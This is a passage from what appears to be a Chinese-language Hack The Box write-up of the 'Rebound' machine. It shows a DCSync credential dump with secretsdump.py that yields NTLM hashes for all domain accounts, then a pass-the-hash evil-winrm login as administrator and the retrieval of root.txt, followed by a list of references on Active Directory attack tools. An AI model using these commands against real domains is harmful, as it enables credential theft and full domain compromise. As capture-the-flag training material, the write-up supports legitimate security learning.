(impacket-fork) [root@kali ~ ]$ KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache' secretsdump.py -no-pass -k dc01.rebound.htb -just-dc-ntlm
/root/impacket-fork/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.10.1.dev1+20231106.134307.9aa93730', 'secretsdump.py')
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1108b27a9ff61ed4139d1443fbcf664b:::
ppaul:1951:aad3b435b51404eeaad3b435b51404ee:7785a4172e31e908159b0904e1153ec0:::
llune:2952:aad3b435b51404eeaad3b435b51404ee:e283977e2cbffafc0d6a6bd2a50ea680:::
fflock:3382:aad3b435b51404eeaad3b435b51404ee:1fc1d0f9c5ada600903200bc308f7981:::
jjones:5277:aad3b435b51404eeaad3b435b51404ee:e1ca2a386be17d4a7f938721ece7fef7:::
mmalone:5569:aad3b435b51404eeaad3b435b51404ee:87becdfa676275415836f7e3871eefa3:::
nnoon:5680:aad3b435b51404eeaad3b435b51404ee:f9a5317b1011878fc527848b6282cd6e:::
ldap_monitor:7681:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
oorend:7682:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
winrm_svc:7684:aad3b435b51404eeaad3b435b51404ee:4469650fd892e98933b4536d2e86e512:::
batch_runner:7685:aad3b435b51404eeaad3b435b51404ee:d8a34636c7180c5851c19d3e865814e0:::
tbrady:7686:aad3b435b51404eeaad3b435b51404ee:114e76d0be2f60bd75dc160ab3607215:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:989c1783900ffcb85de8d5ca4430c70f:::
delegator$:7687:aad3b435b51404eeaad3b435b51404ee:43e9069a73081ecfcbe1514e1d4e3bc8:::
[*] Cleaning up...

使用evil-winrm获得一个administrator shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌─[root@kali] - [~/hackthebox/machine/rebound] - [2582]
└─[$] evil-winrm -i dc01 -u administrator -H 176be138594933bb67db3b2572fc91b8                                                                         [5:36:50]

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
rebound\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> cat root.txt
af2b247a25910f7c8b320c45ab507ae4

Reference Sources

  • 0xdf’s blog rebound walkthrough
  • Impacket
  • New Attack Paths? AS Requested Service Tickets
  • Support for Kerberoasting without pre-authentication and ST request through AS-REQ #1413
  • impacket github分支
  • bloodhound.py
  • Active Directory Bloodhound
  • Descendant Object Takeover (DOT)
  • powerview.py
  • ShadowCredentials
  • KrbRelay
  • RunasCs
  • bloodyAD
  • Service-for-User (S4U)